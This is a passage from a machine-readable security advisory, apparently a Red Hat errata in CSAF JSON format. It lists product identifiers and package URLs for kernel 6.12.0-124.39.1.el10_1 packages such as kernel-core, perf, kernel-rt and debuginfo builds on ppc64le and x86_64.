"category": "product_version",
"name": "perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-ppc64le@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra-matched@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"product": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_id": "libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@6.12.0-124.39.1.el10_1?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "perf-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "perf-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "perf-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rv-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "rv-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "rv-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-x86_64@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-debuginfo@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-core@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-core@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-devel@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-core@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-extra@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-devel@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-core@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-extra@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-uki-virt@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra-matched@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt-addons@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@6.12.0-124.39.1.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"product": {
"name": "libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"product_id": "libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"product_identification_helper": {
